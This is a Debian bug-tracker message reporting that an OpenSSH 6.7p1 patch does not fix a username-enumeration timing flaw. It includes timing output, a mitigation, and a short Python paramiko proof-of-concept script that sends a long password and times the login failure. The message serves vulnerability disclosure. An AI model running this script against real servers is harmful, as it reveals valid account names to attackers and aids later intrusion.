Bug#831902: SSH User Enumeration issue still present
I have installed this patch on a few servers however the timing issue still
seems to be present.
I tried setting up a fresh server using the netinst .iso file and I only
installed the "SSH server" package in the Software selection stage (no other
packages were install or configuration changes made). I ensured that all the
packages were up to date.
michael@ssh-test-box:~$ sudo sshd -v
[sudo] password for michael:
unknown option -- v
OpenSSH_6.7p1 Debian-5+deb8u3, OpenSSL 1.0.1t 3 May 2016
usage: sshd [-46DdeiqTt] [-b bits] [-C connection_spec] [-c host_cert_file]
[-E log_file] [-f config_file] [-g login_grace_time]
[-h host_key_file] [-k key_gen_time] [-o option] [-p port]
[-u len]
Then I ran the POC code (below) and valid users took 22 seconds to fail while
no invalid users took around 3 seconds.
Setting PasswordAuthentication no in /etc/ssh/sshd_config mitigates this issue.
[michael@ezreal ~]$ python ssh_test.py
user: alice
0:00:02.039722
[michael@ezreal ~]$ python ssh_test.py
user: bob
0:00:02.613451
[michael@ezreal ~]$ python ssh_test.py
user: michael
0:00:22.195203
[michael@ezreal ~]$ python ssh_test.py
user: eve
0:00:03.564072
# ssh_test.py
import paramiko
from datetime import datetime
user=input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=datetime.now()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect('ssh-test-box.internal', username=user,
password=p)
except:
endtime=datetime.now()
total=endtime-starttime
print(total)
Reply to: